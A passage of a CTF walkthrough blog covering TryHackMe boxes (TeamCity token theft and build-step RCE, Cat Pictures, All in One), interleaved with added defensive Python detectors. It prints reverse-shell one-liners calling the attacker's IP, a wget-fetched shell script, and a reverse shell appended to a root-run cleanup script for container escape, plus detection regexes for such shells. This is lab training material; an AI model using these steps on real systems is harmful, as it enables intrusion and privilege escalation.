 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

541 packages can be updated.
342 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

sys-internal@vulnnet-internal:~$ id
uid=1000(sys-internal) gid=1000(sys-internal) groups=1000(sys-internal),24(cdrom)

However, after looking around for a while I didn't find anything particularly special. It took me quite some time to go back over everything from the start to see whether I had missed something; going back to the initial RCE I realised there was one rather interesting directory I had skipped: TeamCity

redis@vulnnet-internal:/$ ls -la
ls -la
total 533816
drwxr-xr-x  24 root root      4096 Feb  6  2021 .
drwxr-xr-x  24 root root      4096 Feb  6  2021 ..
drwx------   2 root root      4096 Feb  1  2021 .cache
drwxr-xr-x  12 root root      4096 Feb  6  2021 TeamCity
drwxr-xr-x   2 root root      4096 Feb  2  2021 bin
drwxr-xr-x   3 root root      4096 Feb  1  2021 boot
drwxr-xr-x   6 root root       380 Nov 23 07:20 dev
drwxr-xr-x 129 root root     12288 Feb  7  2021 etc
d---------   2 root root        40 Nov 23 07:20 home
lrwxrwxrwx   1 root root        34 Feb  1  2021 initrd.img -> boot/initrd.img-4.15.0-135-generic
lrwxrwxrwx   1 root root        33 Feb  1  2021 initrd.img.old -> boot/initrd.img-4.15.0-20-generic
drwxr-xr-x  18 root root      4096 Feb  1  2021 lib
drwxr-xr-x   2 root root      4096 Feb  1  2021 lib64
drwx------   2 root root     16384 Feb  1  2021 lost+found
drwxr-xr-x   4 root root      4096 Feb  2  2021 media
drwxr-xr-x   2 root root      4096 Feb  1  2021 mnt
drwxr-xr-x   4 root root      4096 Feb  2  2021 opt
dr-xr-xr-x 133 root root         0 Nov 23 07:20 proc
d---------   2 root root        40 Nov 23 07:20 root
drwxr-xr-x  27 root root       860 Nov 23 07:25 run
drwxr-xr-x   2 root root      4096 Feb  2  2021 sbin
drwxr-xr-x   2 root root      4096 Feb  1  2021 srv
-rw-------   1 root root 546529280 Feb  1  2021 swapfile
dr-xr-xr-x  13 root root         0 Nov 23 08:50 sys
drwxrwxrwt   2 root root      4096 Nov 23 09:05 tmp
drwxr-xr-x  10 root root      4096 Feb  1  2021 usr
drwxr-xr-x  13 root root      4096 Feb  1  2021 var
lrwxrwxrwx   1 root root        31 Feb  1  2021 vmlinuz -> boot/vmlinuz-4.15.0-135-generic
lrwxrwxrwx   1 root root        30 Feb  1  2021 vmlinuz.old -> boot/vmlinuz-4.15.0-20-generic

This is software for setting up a build server for projects and integrating the tools used to develop them

Its default port is 8111, and when I checked the services listening on the box I saw 8111 there too

redis@vulnnet-internal:/$ ss -ltp
ss -ltp
Cannot open netlink socket: Address family not supported by protocol
State  Recv-Q  Send-Q         Local Address:Port             Peer Address:Port                                                                                  
LISTEN 0       0                    0.0.0.0:45863                 0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:rsync                 0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:netbios-ssn           0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:6379                  0.0.0.0:*      users:(("ss",pid=19207,fd=6),("bash",pid=2072,fd=6),("python",pid=2071,fd=6),("sh",pid=538,fd=6))
LISTEN 0       0                    0.0.0.0:36171                 0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:sunrpc                0.0.0.0:*                                                                                     
LISTEN 0       0                 127.0.0.53:domain                0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:ssh                   0.0.0.0:*                                                                                     
LISTEN 0       0                  127.0.0.1:ipp                   0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:microsoft-ds          0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:nfs                   0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:36545                 0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:47331                 0.0.0.0:*                                                                                     
LISTEN 0       0         [::ffff:127.0.0.1]:56551                       *:*                                                                                     
LISTEN 0       0         [::ffff:127.0.0.1]:8105                        *:*                                                                                     
LISTEN 0       0                          *:rsync                       *:*                                                                                     
LISTEN 0       0                      [::1]:6379                        *:*      users:(("ss",pid=19207,fd=7),("bash",pid=2072,fd=7),("python",pid=2071,fd=7),("sh",pid=538,fd=7))
LISTEN 0       0                          *:34283                       *:*                                                                                     
LISTEN 0       0                          *:netbios-ssn                 *:*                                                                                     
LISTEN 0       0                          *:55021                       *:*                                                                                     
LISTEN 0       0         [::ffff:127.0.0.1]:8111                        *:*                                                                                     
LISTEN 0       0                          *:sunrpc                      *:*                                                                                     
LISTEN 0       0                          *:36497                       *:*                                                                                     
LISTEN 0       0                          *:43635                       *:*                                                                                     
LISTEN 0       0                          *:ssh                         *:*                                                                                     
LISTEN 0       0                      [::1]:ipp                         *:*                                                                                     
LISTEN 0       0                          *:microsoft-ds                *:*                                                                                     
LISTEN 0       0                          *:nfs                         *:*                                                                                     
LISTEN 0       0                          *:9090                        *:*                                                                                     
LISTEN 0       0                          *:37411                       *:*  

Use SSH to forward a local port to port 8111

┌──(kalikali)-[~]
└─$ ssh -L 8111:127.0.0.1:8111 sys-internal@10.10.116.142
bind [127.0.0.1]:8111: Address already in use
channel_setup_fwd_listener_tcpip: cannot listen to port: 8111
Could not request local forwarding.
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

541 packages can be updated.
342 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Nov 23 11:25:55 2022 from 10.6.0.191
sys-internal@vulnnet-internal:~$ 

Visit 127.0.0.1:8111

web

Log in as a Super user:

super-user

This means I need a token to log in. The first thing I thought of was looking for it in the logs, since earlier login sessions might still be recorded there.

Search for the keyword token in every file under the /logs directory

sys-internal@vulnnet-internal:/TeamCity$ grep -iR token /TeamCity/logs/ 2>/dev/null
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 1189775395164371106 (use empty username with the token as the password to access the server)

With the last token I managed to log in. I now have root-level access, meaning I have full control over TeamCity and will look for a way to get RCE
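The weakness here is that TeamCity writes its super-user token to catalina.out on every start-up, and that log was readable by a low-privilege account. The following detector is an added example, not part of the original write-up: it scans constructed log lines (reduced from the grep output above) for the token line, keeps the distinct tokens in order, and rates the exposure by the log file's permission bits (the mode values are assumptions for the demonstration).

```python
"""Detect TeamCity super-user tokens in a readable log file.

Added example, not part of the original write-up. SAMPLE_LOG is constructed
from the line format seen in catalina.out; the file modes are assumptions.
"""
import re
import stat

# TeamCity prints this line at every start-up (and whenever the token is regenerated).
TOKEN_RE = re.compile(r"Super user authentication token:\s*(\d+)")

# Constructed sample: the write-up's grep output reduced to the relevant lines.
SAMPLE_LOG = """\
[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
[TeamCity] Server shutdown has been completed
[TeamCity] Super user authentication token: 1189775395164371106 (use empty username with the token as the password to access the server)
"""


def find_super_user_tokens(lines):
    """Return the distinct tokens in order of first appearance. Only the last
    one is still accepted by the server, but all of them show the leak."""
    seen = []
    for line in lines:
        m = TOKEN_RE.search(line)
        if m and m.group(1) not in seen:
            seen.append(m.group(1))
    return seen


def log_is_overexposed(mode):
    """True when the permission bits grant group or other read access."""
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


def assess(lines, mode):
    """Combine the two checks into one verdict string for a log file."""
    tokens = find_super_user_tokens(lines)
    if not tokens:
        return "no super-user token in log"
    if log_is_overexposed(mode):
        return f"CRITICAL: {len(tokens)} super-user token(s) in a log readable by non-owners"
    return f"WARNING: {len(tokens)} super-user token(s) in log, owner-readable only"


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print(find_super_user_tokens(lines))
    print(assess(lines, 0o644))  # assumed mode of a world-readable catalina.out
    print(assess(lines, 0o600))
```

In the write-up the grep ran as sys-internal, so a mode of 0o644 (or a group that includes that user) is the condition the CRITICAL branch models.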

After spending a fair amount of time learning more about TeamCity, I found a way to get RCE. First, create a new project, then add a Build Step with the Command Line runner and enter the payload into Custom script; it will look like this

RCE

Then save it. Next, create a listener on the port used in the payload; here I use port 9001

nc -lnvp 9001

Once it is saved, I click Run in the next window

run

Back to the listener

┌──(kalikali)-[~]
└─$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.6.0.191] from (UNKNOWN) [10.10.211.50] 49704
root@vulnnet-internal:/TeamCity/buildAgent/work/2b35ac7e0452d98f# id   
id
uid=0(root) gid=0(root) groups=0(root)
root@vulnnet-internal:/TeamCity/buildAgent/work/2b35ac7e0452d98f# 
root@vulnnet-internal:/TeamCity/buildAgent/work/2b35ac7e0452d98f# cd
cd
root@vulnnet-internal:~# ls /root
ls /root
root.txt
root@vulnnet-internal:~# 

Tryhackme - Cat Pictures

  1. Reconnaissance
  2. SSH
  3. Privilege escalation

intro

Hello, it's me again. Today I'll be solving the CTF TryHackMe | Cat Pictures

Reconnaissance

As usual, the first thing to do is scan for open ports on the target host

PORT     STATE SERVICE      REASON  VERSION
21/tcp   open  ftp          syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp           162 Apr 02  2021 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.6.0.191
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh          syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37436480d35a746281b7806b1a23d84a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIDEV5ShmazmTw/1A6+19Bz9t3Aa669UOdJ6wf+mcv3vvJmh6gC8V8J58nisEufW0xnT69hRkbqrRbASQ8IrvNS8vNURpaA0cycHDntKA17ukX0HMO7AS6X8uHfIFZwTck5v6tLAyHlgBh21S+wOEqnANSms64VcSUma7fgUCKeyJd5lnDuQ9gCnvWh4VxSNoW8MdV64sOVLkyuwd0FUTiGctjTMyt0dYqIUnTkMgDLRB77faZnMq768R2x6bWWb98taMT93FKIfjTjGHV/bYsd/K+M6an6608wMbMbWz0pa0pB5Y9k4soznGUPO7mFa0n64w6ywS7wctcKngNVg3H
|   256 53c682efd27733efc13d9c1513540eb2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCs+ZcCT7Bj2uaY3QWJFO4+e3ndWR1cDquYmCNAcfOTH4L7lBiq1VbJ7Pr7XO921FXWL05bAtlvY1sqcQT6W43Y=
|   256 ba97c323d4f2cc082ce12b3006189541 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGq9I/445X/oJstLHIcIruYVdW4KqIFZks9fygfPkkPq
4420/tcp open  nvm-express? syn-ack
| fingerprint-strings: 
|   DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     INTERNAL SHELL SERVICE
|     please note: cd commands do not work at the moment, the developers are fixing it at the moment.
|     ctrl-c
|     Please enter password:
|     Invalid password...
|     Connection Closed
|   NULL, RPCCheck: 
|     INTERNAL SHELL SERVICE
|     please note: cd commands do not work at the moment, the developers are fixing it at the moment.
|     ctrl-c
|_    Please enter password:
8080/tcp open  http         syn-ack Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
|_http-title: Cat Pictures - Index page
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

On FTP port 21, the Anonymous user can see a file called note.txt. Log in to fetch this file

┌──(kalikali)-[~]
└─$ ftp 10.10.107.28
Connected to 10.10.107.28.
220 (vsFTPd 3.0.3)
Name (10.10.107.28:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> 
ftp> dir
229 Entering Extended Passive Mode (|||60158|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           162 Apr 02  2021 note.txt
226 Directory send OK.
ftp> get note.txt /home/kali/note.txt
local: /home/kali/note.txt remote: note.txt
229 Entering Extended Passive Mode (|||53132|)
150 Opening BINARY mode data connection for note.txt (162 bytes).
100% |************************************************|   162      176.96 KiB/s    00:00 ETA
226 Transfer complete.
162 bytes received in 00:00 (0.50 KiB/s)
ftp> 

note.txt

┌──(kalikali)-[~]
└─$ cat note.txt 
In case I forget my password, I'm leaving a pointer to the internal shell service on the server.

Connect to port 4420, the password is sardinethecat.
- catlover
                    
┌──(kali㉿kali)-[~]
└─$ 

After a little research I learned that port 4420 with the nvm-express service, also known as NVMe, is an interface standard for SSDs. Use netcat to connect to this port

nc 10.10.107.28 4420

┌──(kalikali)-[~]
└─$ nc 10.10.107.28 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
sardinethecat
Password accepted
ls
bin
etc
home
lib
lib64
opt
tmp
usr

This shell is hard to use. However, after looking around for a while I found wget in /usr/bin

This means I can download files with wget. So I'll create an sh file containing the reverse shell and push it to the machine

┌──(kalikali)-[~]
└─$ echo "bash -i >& /dev/tcp/10.6.0.191/9001 0>&1" > exploit.sh   

Start a local HTTP server

┌──(kalikali)-[~]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Download the RCE file onto the machine

wget http://10.6.0.191:8000/exploit.sh
ERROR: could not open HSTS store. HSTS will be disabled.
http://10.6.0.191:8000/exploit.sh
Connecting to 10.6.0.191:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41 [text/x-sh]
Saving to: 'exploit.sh'

     0K                                                       100% 5.61M=0s

Now create a listener on port 9001

nc -lnvp 9001

On the machine, run the sh file just downloaded

bash exploit.sh

┌──(kalikali)-[~]
└─$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.6.0.191] from (UNKNOWN) [10.10.107.28] 47420
bash: cannot set terminal process group (1839): Inappropriate ioctl for device
bash: no job control in this shell
I have no name!@cat-pictures:/#

SSH

I found a file named runme in the user directory /home/catlover. I tried to cat it and realised it's a binary. Looking closely, though, there is one readable line.

I have no name!@cat-pictures:/home/catlover# cat runme
cat runme
UU   =x - = 888 XXXDDStd888 Ptd   ddQtdRt=��/lib64/ld-linux-x86-64.so.2GNUGNU��Oy��������?8��GNU▒�▒▒�ems��
                                             C���/��*Fm]S; P , 
......

rebeccaPlease enter yout password: Welcome, catlover! SSH key transfer queued! touch /tmp/gibmethesshkeyAccess Deniedd

......

This means that when I enter the correct password, I'll get the ssh key
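What `cat` showed here is the binary's string table: a password literal stored right next to the prompt that compares against it. The following script is an added example, not part of the original write-up; it does what `strings` does (printable runs of at least four bytes) over a constructed byte string that mimics the readable run seen above (the real runme is not reproduced), then pairs each password prompt with the literal stored immediately before it, which is how secret scanners flag hard-coded credentials in compiled programs.

```python
"""Recover printable strings from a binary and flag hard-coded credential
candidates, the way `strings` exposes the password inside runme.

Added example, not part of the original write-up. SAMPLE_BINARY is a
constructed byte string mimicking the readable run seen in `cat runme`.
"""
import re

# Constructed: header-like junk followed by a .rodata-style string table.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00>\x00"
    b"/lib64/ld-linux-x86-64.so.2\x00GNU\x00\x00\x00"
    b"\x8a\x02\x00\x00\x01\x00\x00\x00"
    b"rebecca\x00Please enter yout password: \x00Welcome, catlover! "
    b"SSH key transfer queued! \x00touch /tmp/gibmethesshkey\x00Access Denied\x00"
    b"\x00\x01\x02\x03"
)

MIN_LEN = 4
PROMPT_WORDS = ("password", "passphrase", "secret")


def extract_strings(data, min_len=MIN_LEN):
    """Return printable ASCII runs of at least min_len bytes, in file order
    (the same heuristic strings(1) uses by default)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def credential_candidates(strings):
    """Pair each password-style prompt with the string stored directly before
    it. Compilers keep literals in source order in .rodata, so a program that
    does `if (strcmp(input, "rebecca") == 0)` right after printing its prompt
    tends to leave the secret adjacent to the prompt text."""
    hits = []
    for i, s in enumerate(strings):
        if i > 0 and any(w in s.lower() for w in PROMPT_WORDS):
            hits.append((strings[i - 1], s))
    return hits


if __name__ == "__main__":
    found = extract_strings(SAMPLE_BINARY)
    for s in found:
        print(repr(s))
    print("candidates:", credential_candidates(found))
```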

There is a name, rebecca, right before the input prompt. I'll try running this file and entering rebecca

I have no name!@cat-pictures:/home/catlover# ./runme
./runme
Please enter yout password: rebecca
Welcome, catlover! SSH key transfer queued! 
I have no name!@cat-pictures:/home/catlover# ls -la
ls -la
total 32
drwxr-xr-x 2 0 0  4096 Nov 18 07:24 .
drwxr-xr-x 3 0 0  4096 Apr  2  2021 ..
-rw-r--r-- 1 0 0  1675 Nov 18 07:24 id_rsa
-rwxr-xr-x 1 0 0 18856 Apr  3  2021 runme
I have no name!@cat-pictures:/home/catlover# 
I have no name!@cat-pictures:/home/catlover# cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
I have no name!@cat-pictures:/home/catlover# 

Save this key locally and log in over SSH with it.

┌──(kalikali)-[~]
└─$ ssh -i id_rsa catlover@10.10.213.118
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Nov 17 23:29:45 PST 2022

  System load:                    0.41
  Usage of /:                     37.2% of 19.56GB
  Memory usage:                   60%
  Swap usage:                     0%
  Processes:                      100
  Users logged in:                0
  IP address for eth0:            10.10.213.118
  IP address for br-98674f8f20f9: 172.18.0.1
  IP address for docker0:         172.17.0.1


52 updates can be applied immediately.
25 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


Last login: Fri Jun  4 14:40:35 2021
root@7546fa2336d6:/# id
uid=0(root) gid=0(root) groups=0(root)
root@7546fa2336d6:/# ls root/
flag.txt

Privilege escalation

While looking through the directories, I realised this is a container rather than the actual machine: it has a .dockerenv file, and the root directory layout looks just like a Docker image.

root@7546fa2336d6:/# ls -la
total 108
drwxr-xr-x   1 root root 4096 Mar 25  2021 .
drwxr-xr-x   1 root root 4096 Mar 25  2021 ..
-rw-------   1 root root  588 Jun  4  2021 .bash_history
-rwxr-xr-x   1 root root    0 Mar 25  2021 .dockerenv
drwxr-xr-x   1 root root 4096 Apr  9  2021 bin
drwxr-xr-x   3 root root 4096 Mar 24  2021 bitnami
drwxr-xr-x   2 root root 4096 Jan 30  2021 boot
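The same judgement, made programmatically, as an added example (not from the original writeup): besides /.dockerenv it also looks at Podman's /run/.containerenv and at the cgroup path of PID 1, which is what most "am I in a container" checks rely on. The cgroup text used in the usage below is constructed; the container id in it is the hostname from the prompt above.

```python
"""Container indicator check (added example, not from the original writeup)."""
from __future__ import annotations

from pathlib import Path

# Substrings of /proc/1/cgroup paths that point at a container runtime.
CGROUP_MARKERS = ("/docker/", "/lxc/", "/kubepods", "/containerd", "/ecs/")


def cgroup_indicators(cgroup_text: str) -> list[str]:
    """Return the runtime markers found in /proc/1/cgroup content.

    cgroup v1 lines look like "12:pids:/docker/<id>"; cgroup v2 has a single
    "0::/<path>" line. Only the path part after the second colon is inspected.
    """
    found = set()
    for line in cgroup_text.splitlines():
        path = line.split(":", 2)[-1]
        for marker in CGROUP_MARKERS:
            if marker in path:
                found.add(marker.strip("/"))
    return sorted(found)


def container_indicators(root: str = "/", cgroup_text: str | None = None) -> dict:
    """Collect indicators under `root`; cgroup text is read from disk if not given."""
    base = Path(root)
    if cgroup_text is None:
        cgroup_file = base / "proc" / "1" / "cgroup"
        cgroup_text = cgroup_file.read_text() if cgroup_file.is_file() else ""
    return {
        "dockerenv": (base / ".dockerenv").exists(),                 # Docker
        "containerenv": (base / "run" / ".containerenv").exists(),  # Podman
        "cgroup": cgroup_indicators(cgroup_text),
    }


def looks_like_container(indicators: dict) -> bool:
    """Any single indicator is enough to treat the environment as a container."""
    return bool(
        indicators["dockerenv"]
        or indicators["containerenv"]
        or indicators["cgroup"]
    )


if __name__ == "__main__":
    # Constructed cgroup line; the id is the hostname from the page's prompt.
    sample = container_indicators("/", "12:pids:/docker/7546fa2336d6")
    print(sample, "->", "container" if looks_like_container(sample) else "no indicator")
```

Run it without arguments on a live host to read the real /.dockerenv and /proc/1/cgroup; absence of every indicator is not proof of a bare machine, since runtimes can hide these, but their presence is a strong signal.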

One more thing: inside /opt/clean there is a clean.sh script that deletes everything in /tmp. What it does is not really important, though, because I only need to append my reverse shell to this script and it will be executed for me.

root@7546fa2336d6:/# echo "bash -i >& /dev/tcp/10.6.0.191/2402 0>&1" >> opt/clean/clean.sh 
root@7546fa2336d6:/# cat opt/clean/clean.sh 
#!/bin/bash

rm -rf /tmp/*
bash -i >& /dev/tcp/10.6.0.191/2402 0>&1
root@7546fa2336d6:/#

Start a listener on port 2402 and wait.

nc -lnvp 2402

┌──(kalikali)-[~]
└─$ nc -lnvp 2402
listening on [any] 2402 ...
connect to [10.6.0.191] from (UNKNOWN) [10.10.213.118] 34968
bash: cannot set terminal process group (2329): Inappropriate ioctl for device
bash: no job control in this shell
root@cat-pictures:~# 
root@cat-pictures:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@cat-pictures:~# ls /root
ls /root
firewall
root.txt
root@cat-pictures:~# 
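The escape above works because a script the host runs as root is writable from inside the container, so one appended line turns a /tmp cleaner into a callback. As an added example (not from the original writeup), here are the two checks a defender would run over such scripts: a content scan for shell idioms that have no business in a cleanup job, and a permission check that a root-executed script is not writable by anyone but root. The two script bodies are constructed from the clean.sh output shown above.

```python
"""Tampered maintenance-script detection (added example, not from the writeup)."""
from __future__ import annotations

import re
import stat

# Idioms commonly seen in shell-based callbacks; any hit deserves a look.
SUSPICIOUS = {
    "dev_tcp_redirect": re.compile(r"/dev/(tcp|udp)/"),
    "interactive_shell": re.compile(r"\b(ba)?sh\s+-i\b"),
    "nc_exec": re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"),
    "socat_exec": re.compile(r"\bsocat\b.*\bexec:"),
    "inline_interpreter": re.compile(r"\b(python[23]?|perl|php|ruby)\b\s+-[ce]\s"),
}


def scan_script(text: str) -> list[tuple[int, str, str]]:
    """Return (line_no, rule, line) for every suspicious non-comment line."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for rule, rx in SUSPICIOUS.items():
            if rx.search(stripped):
                hits.append((no, rule, stripped))
    return hits


def writable_by_non_root(mode: int, uid: int, gid: int) -> bool:
    """True if a root-executed script could be modified by a non-root principal.

    `mode` is st_mode. Root-owned 0644 is fine; world-writable, group-writable
    with a non-root group, or owned by a non-root uid is not.
    """
    if uid != 0:
        return True
    if mode & stat.S_IWOTH:
        return True
    if mode & stat.S_IWGRP and gid != 0:
        return True
    return False


def baseline_diff(known_good: str, current: str) -> list[str]:
    """Non-empty lines present now that were not in the known-good copy."""
    good = set(known_good.splitlines())
    return [line for line in current.splitlines() if line and line not in good]


# Constructed from the page: clean.sh before and after the appended line.
ORIGINAL = "#!/bin/bash\n\nrm -rf /tmp/*\n"
TAMPERED = ORIGINAL + "bash -i >& /dev/tcp/10.6.0.191/2402 0>&1\n"

if __name__ == "__main__":
    for no, rule, line in scan_script(TAMPERED):
        print(f"line {no}: {rule}: {line}")
    print("added since baseline:", baseline_diff(ORIGINAL, TAMPERED))
    print("0755 root:root writable by non-root?", writable_by_non_root(0o100755, 0, 0))
```

The baseline comparison is the cheapest of the three: a host that keeps a hash or copy of every cron-driven script catches this class of tampering regardless of what the attacker appends.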

Tryhackme - All in One

  1. Reconnaissance
  2. SSH
  3. Privilege escalation

intro

Hello, it's me again. Today I will be solving the TryHackMe | All in One CTF.

Reconnaissance

As usual, the first thing to do is scan for open ports on the target host.

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.6.0.191
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e25c3322765c9366cd969c166ab317a4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLcG2O5LS7paG07xeOB/4E66h0/DIMR/keWMhbTxlA2cfzaDhYknqxCDdYBc9V3+K7iwduXT9jTFTX0C3NIKsVVYcsLxz6eFX3kUyZjnzxxaURPekEQ0BejITQuJRUz9hghT8IjAnQSTPeA+qBIB7AB+bCD39dgyta5laQcrlo0vebY70Y7FMODJlx4YGgnLce6j+PQjE8dz4oiDmrmBd/BBa9FxLj1bGobjB4CX323sEaXLj9XWkSKbc/49zGX7rhLWcUcy23gHwEHVfPdjkCGPr6oiYj5u6OamBuV/A6hFamq27+hQNh8GgiXSgdgGn/8IZFHZQrnh14WmO8xXW5
|   256 1b6a36e18eb4965ec6ef0d91375859b6 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Ww9ui4NQDHA5l+lumRpLsAXHYNk4lkghej9obWBlOwnV+tIDw4mgmuO1C3U/WXRgn0GrESAnMpi1DSxy8t1k=
|   256 fbfadbea4eed202b91189d58a06a50ec (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAOG6ExdDNH+xAyzd4w1G4E9sCfiiooQhmebQX6nIcH/
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Trying the FTP service on port 21 with the anonymous user gave me nothing, since the directory is completely empty. I also tried uploading a file with put, but got nowhere.

Back to the web server on port 80, I used dirsearch to look for hidden paths.

[03:21:47] 301 -  316B  - /wordpress  ->  http://10.10.248.46/wordpress/   
[03:23:23] 200 -  197B  - /hackathons   

This means the site is built on WordPress. Before going there, though, I will check the other hidden path first. Looking at its page source, I find an encoded string.

<html>
<body>

<h1>Damn how much I hate the smell of <i>Vinegar </i> :/ !!!  </h1>

<!-- Dvc W@iyur@123 -->
<!-- KeepGoing -->
</body>
</html>

Using CyberChef with the key KeepGoing:

[screenshot: decode]
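The "Vinegar" hint in the page reads as a pointer to the Vigenère cipher (my reading, the writeup does not name it). As an added example, not from the original writeup, here is the decode done by hand rather than in CyberChef: the comment "Dvc W@iyur@123" with key "KeepGoing" comes out as "Try H@ckme@123", which is where the password used later comes from. Only letters are shifted and only letters consume a key position, so "@" and the digits pass through untouched; this is the same convention CyberChef's Vigenère recipe uses, and it is why the decoded text keeps its symbols in place.

```python
"""Vigenere decode of the hackathons hint (added example, not from the writeup)."""


def vigenere(text: str, key: str, decrypt: bool = True) -> str:
    """Shift each ASCII letter of `text` by the matching key letter.

    Non-letters are copied through unchanged and do not advance the key,
    so symbols and digits keep their positions in the output.
    """
    if not key or not key.isalpha():
        raise ValueError("key must be non-empty and letters only")
    shifts = [ord(k.lower()) - ord("a") for k in key]
    out = []
    pos = 0  # index into the key; advances only on letters
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = shifts[pos % len(shifts)]
            if decrypt:
                shift = -shift
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            pos += 1
        else:
            out.append(ch)
    return "".join(out)


# Taken from the page's HTML comments.
CIPHERTEXT = "Dvc W@iyur@123"
KEY = "KeepGoing"


def recover_password() -> str:
    """Decode the comment and drop the leading 'Try ' hint word."""
    plain = vigenere(CIPHERTEXT, KEY)
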